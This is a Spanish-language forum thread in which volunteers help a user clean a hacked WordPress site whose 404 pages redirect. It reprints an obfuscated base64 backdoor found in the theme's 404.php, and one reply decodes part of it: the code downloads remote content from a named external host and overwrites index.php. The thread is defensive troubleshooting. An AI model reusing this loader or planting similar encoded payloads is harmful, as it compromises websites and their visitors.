Autor
|
Tema: Mi Wordpress Hackeado (Leído 36,991 veces)
|
ka0s
Desconectado
Mensajes: 308
|
El "malware" al parecer solo afecta a las redirecciones 404. Archivos normales funcionan bien. http://www.wilboradalibros.com.ar/readme.html Me he fijado que existe un index.php pero esta vacio. Podrías mirar a ver si tiene algo sospechoso ? Aparte, intenta buscar algún archivo que tenga error404 o 404 o algo así en el nombre.. si existe, muestra a ver cual es su contenido. PD: Las urls ponlas entre etiquetas geshi para evitar que otros usuarios las visiten sin querer.
Edit: http://www.wilboradalibros.com.ar/wp-login.php Lanza errores PHP que dicen que no puede modificar los headers. Apunta a la linea 154 en /wp-includes/functions.wp-scripts.php Saludos #!drvy MUCHAS GRACIAS por tu tiempo. Miré el archivo .php y está completamente vacío. Lo que no entendí es tus últimas 2 líneas que debo hacer con la línea 154. Podrías aclararmelo? Nuevamente muchas gracias!! EDIT: La línea 154, tiene esto: * Do not allow accidental or negligent de-registering of critical scripts in the admin. * Show minimal remorse if the correct hook is used. */ $current_filter = current_filter(); if ( ( is_admin() && 'admin_enqueue_scripts' !== $current_filter ) || ( 'wp-login.php' === $GLOBALS['pagenow'] && 'login_enqueue_scripts' !== $current_filter ) ) { 'jquery', 'jquery-core', 'jquery-migrate', 'jquery-ui-core', 'jquery-ui-accordion', 'jquery-ui-autocomplete', 'jquery-ui-button', 'jquery-ui-datepicker', 'jquery-ui-dialog', 'jquery-ui-draggable', 'jquery-ui-droppable', 'jquery-ui-menu', 'jquery-ui-mouse', 'jquery-ui-position', 'jquery-ui-progressbar', 'jquery-ui-resizable', 'jquery-ui-selectable', 'jquery-ui-slider', 'jquery-ui-sortable', 'jquery-ui-spinner', 'jquery-ui-tabs', 'jquery-ui-tooltip', 'jquery-ui-widget', 'underscore', 'backbone', ); $message = sprintf( __ ( 'Do not deregister the %1$s script in the administration area. To target the frontend theme, use the %2$s hook.' ), "<code>$handle</code>", '<code>wp_enqueue_scripts</code>' ); _doing_it_wrong( __FUNCTION__, $message, '3.6' ); return; } } $wp_scripts->remove( $handle ); } /**
|
|
« Última modificación: 24 Julio 2014, 21:05 pm por ka0s »
|
En línea
|
|
|
|
MinusFour
|
Mas bien afecta a las direcciones no fisicas: Ninguna de las paginas de google me funcionan: https://www.google.com/#q=site:wilboradalibros.com.arPero archivos y carpetas de verdad si: http://wilboradaslibros.com.ar/wp-admin/ Por cierto estos errores le salian a la dueña antes? Notice: Undefined index: pagenow in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php on line 154
Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-login.php on line 414
Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-login.php on line 426
Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 883
Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 884
Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 885
Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 886
Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 887
Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 888
Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 891
Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 892
Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 893
Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 894
Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 897
Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 898
Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 899
Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 900 Eso de cannot modify header information me huele a que esta tratando de hacer un redirect usando la header location.
|
|
|
En línea
|
|
|
|
ka0s
Desconectado
Mensajes: 308
|
Mas bien afecta a las direcciones no fisicas: Ninguna de las paginas de google me funcionan: https://www.google.com/#q=site:wilboradalibros.com.arPero archivos y carpetas de verdad si: http://wilboradaslibros.com.ar/wp-admin/ Por cierto estos errores le salian a la dueña antes? Notice: Undefined index: pagenow in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php on line 154
Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-login.php on line 414
Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-login.php on line 426
Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 883
Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 884
Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 885
Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 886
Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 887
Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 888
Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 891
Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 892
Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 893
Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 894
Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 897
Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 898
Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 899
Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 900 Eso de cannot modify header information me huele a que esta tratando de hacer un redirect usando la header location. No eso no le salía. Siempre me dijo que se le redireccionaba su web sin ver errores. Que complicado se está volviendo esto . PD: Arriba edite el post y puse el código de la línea 154 que comentaba #!drvy
|
|
|
En línea
|
|
|
|
MinusFour
|
¿Puedes poner lo que dice en:
wp-includes/pluggable.php, de las lineas 883 a 900? Creo que te pudieron haber modificado ese archivo o tienes algún plugin que este haciendo destrozos.
Diría que si tu base de datos no ha sido dañada, desactiva todos tus plugins y vuelve a re instalar wordpress.
|
|
« Última modificación: 24 Julio 2014, 21:21 pm por MinusFour »
|
En línea
|
|
|
|
ka0s
Desconectado
Mensajes: 308
|
¿Puedes poner lo que dice en:
wp-includes/pluggable.php, de las lineas 883 a 900? Creo que te pudieron haber modificado ese archivo o tienes algún plugin que este haciendo destrozos.
Diría que si tu base de datos no ha sido dañada, desactiva todos tus plugins y vuelve a re instalar wordpress.
De la 875 a 902 dice es esto: (Te lo paso completo para que no quede en partes) function wp_clear_auth_cookie() { /** * Fires just before the authentication cookies are cleared. * * @since 2.7.0 */ do_action( 'clear_auth_cookie' ); setcookie( AUTH_COOKIE , ' ', time() - YEAR_IN_SECONDS , ADMIN_COOKIE_PATH , COOKIE_DOMAIN ); setcookie( SECURE_AUTH_COOKIE , ' ', time() - YEAR_IN_SECONDS , ADMIN_COOKIE_PATH , COOKIE_DOMAIN ); setcookie( AUTH_COOKIE , ' ', time() - YEAR_IN_SECONDS , PLUGINS_COOKIE_PATH , COOKIE_DOMAIN ); setcookie( SECURE_AUTH_COOKIE , ' ', time() - YEAR_IN_SECONDS , PLUGINS_COOKIE_PATH , COOKIE_DOMAIN ); setcookie( LOGGED_IN_COOKIE , ' ', time() - YEAR_IN_SECONDS , COOKIEPATH , COOKIE_DOMAIN ); setcookie( LOGGED_IN_COOKIE , ' ', time() - YEAR_IN_SECONDS , SITECOOKIEPATH , COOKIE_DOMAIN ); // Old cookies setcookie( AUTH_COOKIE , ' ', time() - YEAR_IN_SECONDS , COOKIEPATH , COOKIE_DOMAIN ); setcookie( AUTH_COOKIE , ' ', time() - YEAR_IN_SECONDS , SITECOOKIEPATH , COOKIE_DOMAIN ); setcookie( SECURE_AUTH_COOKIE , ' ', time() - YEAR_IN_SECONDS , COOKIEPATH , COOKIE_DOMAIN ); setcookie( SECURE_AUTH_COOKIE , ' ', time() - YEAR_IN_SECONDS , SITECOOKIEPATH , COOKIE_DOMAIN ); // Even older cookies setcookie( USER_COOKIE , ' ', time() - YEAR_IN_SECONDS , COOKIEPATH , COOKIE_DOMAIN ); setcookie( PASS_COOKIE , ' ', time() - YEAR_IN_SECONDS , COOKIEPATH , COOKIE_DOMAIN ); setcookie( USER_COOKIE , ' ', time() - YEAR_IN_SECONDS , SITECOOKIEPATH , COOKIE_DOMAIN ); setcookie( PASS_COOKIE , ' ', time() - YEAR_IN_SECONDS , SITECOOKIEPATH , COOKIE_DOMAIN ); } endif;
A partir del primer setcookie sería 883 la línea.
|
|
|
En línea
|
|
|
|
ka0s
Desconectado
Mensajes: 308
|
He puesto a funcionar desde el Wordpress mismo un Anti-Malware y me ha encontrado el siguiente backdoor en el archivo 404.php de wp-content/themes Cuando me dirigi a la ruta para verlo, lo que tenía ese archivo era esto: ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtGcFlXbWhpUTJocFdWaE9iRTVxVW1aYVIxWnFZakpTYkV0R2NGbFhiV2hwVVRKb2NGZFdhRTlpUlRWeFZXMWFZVkl4V25GWmFrcFRZa1YwUm1ORmFGVmliSEJvVldwR1lXSldjRVpoUnpsT1VsZDRSbFJWWkd0VE1ERjBXak5rWVZKWGFFTlViWFEwVGxVNVdWUnNjRmRsYTFvelYxUkpkMDVYVWxkaVJsSlBWakpvY0ZWcVJtRk9WbEpJVFVSV2JGWnVRVEZVTVdoRFlWZEtWMU51VG1GV1ZUQjRWRlZrVjFOV1ZsaE9Wa0pyVFdwc2VWZFVRbXRTTURGSVVtdFNVbFpIZUV0VmFrcFRZekZ3UmxwR1pHdFdNVXAzVjJwS2MxVXhTbFZpUlZaWFlrWldORlZ0ZUZOak1WWjBWMnhhYUdWdGVGSldiWFJQVTIxT1JtVklRbHBOYWxaUldrUkpOVlJHYkZkYVJuQnBUV3RhV2xaSE1XRlpWa2w1WlVSV1ZFMUZOVlJhUkVaelYxWldkRTlWTVdoV01EUjVWMnRTVDFGdFVrZGhNMnhRVjBaYWNsVnFSbUZOVm5CR1ZHMXdhbEpYZUVkVmJYTTFWVEZGZDFOdVpGcGxhMVV4V1ZSS1IxZFdUbGhQVlhSVVVsVndkbGRyVm10aWJWSldZMFJXVUZaRk5YRlZXSEJIWWpGa2Nsa3phR3BTTUhCM1YxUk9RMU5zU2xaWGJFSldZVEExUTFkcVNrZFhWbEowVjIxR1UwMXVaekZWZWtKUFZUSlJlR0pHYkZaaVZHeE9XVlprVDAxc2NFVlVhMHByVWpCYVdWUnNaSGRo.Vms1SFYyNUtXR0pIYUU5WmJYUXdWa2RLUlZwRlVtaFdhM0I0VjFkd1MxVXlTa2RSYkZKU1lsUkdiMVpxVG05ak1XUkZVMjEwYVZJeFNraFVNV1IzWVZVeGNWWllaRmhpUjAxNFZGVmtUMDVXYjNsa1JuQk9ZVzE0ZVZZeWVGcE9WVEZJVm10c1ZsZEZTbEZhUkVrMVkyeHNWMWw2Um1oTldFSmFXVlZrWVdGc1NYZFhXR1JhVmxVMVExUXhWbk5TUmxaMVdrWndXRkpyY0RKV1JXUnpZVzFTZEZKc2FFOVdNMUpvVmpCa2EwMVdhM2RhUnpsci5UVWhCTWxsNlFqQlRiRVYzVW0wMVZGWlZOVU5YYWtKelVrWkdXRnBGY0ZKTlJWcDFWVEZXVDFGc2IzZGlSV2hwVW5wR1RWVnFSbmRrTVd4eVdrWmtZV0pWTlVwV2JYQkRWMVV4Y2s1VVNscGlWRlpVV1d0a1MyUldWblZqUlhoU1RWVndNMWRYTUhoVk1rcElWbXRrVUZkSFVtRldNRnBMWkd4U1JsUnJTbWhOVjNRMVZERmtNRmxXVlhsa1NHUmhWMGRTTWxkcVFuTlNSa1pZV2tWd1VrMUZXblZWTVZaUFVXeHZkMkpGVWxKV01sSkxWVlJDUjJKc1pITmFSVGxwVFd0dk1WVldZekZWVmtsNFkwUktXbUpVVmxOWGFrWnlaVlU1V1ZSdGJFNU5SM014VlRGak1WTXlTa2RqUlZKVVZYcFdjUzVaVldoS1lqQTFSVlJZUWsxaGVsWkdWVlpTVjFOc1NsZFhhbFphVFdwQk1WcFdXa05TUlRsWVRWZHNUbUZzVmpOV1ZXUnpZV3MwZVZkc2FGZGlhelZ4VkZkNFdrMHhSWGxpUlVwaFR.VZDRSVlZXWkd0VGJFVjNVbTAxVkZaVk5VTlhha0p6VWtaR1dGcEZjRkpOUlhCNlZqRlNTMkl5VW5KaVJWSmFaVzFvYUZsc1VuTk5WbkJHVkd0T2FHSlZiRFZhVldoaFlXMUdjVkZ1UWxwTmFrWllXVlJDYzJOVk5WWlhiWEJwWVROQmVWZFVTbmROTWxKelkwaFNVRmRHV25KVmExSlRaRlpSZWxwSVdtRk5SM2hGVlZaa2ExTnNSWGRTYlRWVVZsVTFRMWRxUW5OU1JrWllXa1Z3VWsxRlduVlhiWGhIWkd4dmVWZHNhRmRpYXpWeFZGZDRXazB4UlhsTlZtUm9ZbFZhU1ZRd1pHdFRNREZ6VjJwV1drMXFRVEZhVmxaM1RtMU5kMlJITVZaV2VteE5VekZPY2s1NWEzQlBkeWtwT3cpKTs
BORRÉ EL ARCHIVO, pero intenté acceder a la web y sigue redireccionandosé!!
|
|
|
En línea
|
|
|
|
MinusFour
|
Eso es base 64 y se traduce a: $code_txt = 'http://lamirona.aler.org/index.txt'; $path = getenv("DOCUMENT_ROOT").''; if(is_dir($path.'/wp-content') AND is_dir($path.'/wp-admin') AND is_dir($path.'/wp-includes')){ $index_path = $path.'/index.php'; echo '<font color="red"7409 Error</font>';}else{ echo '<font color="red">Error</font>'; } }else{ echo 'error'; }
Seguro que no había nada raro en el index.php?
|
|
|
En línea
|
|
|
|
#!drvy
|
En realidad ese script ha hecho su trabajo xD http://lamirona.aler.org/index.txt Esta vació y por eso el index.php esta vació ka0s los demás archivos sospechosos que te ha reportado el plugin ese cuales son ? Saludos
|
|
|
En línea
|
|
|
|
EFEX
Desconectado
Mensajes: 1.171
"Dinero Facil"
|
Yo miraria en wp-includes que archivos fueron los ultimos en ser modificados.
|
|
|
En línea
|
|
|
|
ka0s
Desconectado
Mensajes: 308
|
En realidad ese script ha hecho su trabajo xD http://lamirona.aler.org/index.txt Esta vació y por eso el index.php esta vació ka0s los demás archivos sospechosos que te ha reportado el plugin ese cuales son ? Saludos Este es el reporte precisamente: Gracias por responder tan rápido y dedicarle su tiempo a mi ayuda. Creo que estamos cerca...
|
|
|
En línea
|
|
|
|
|
|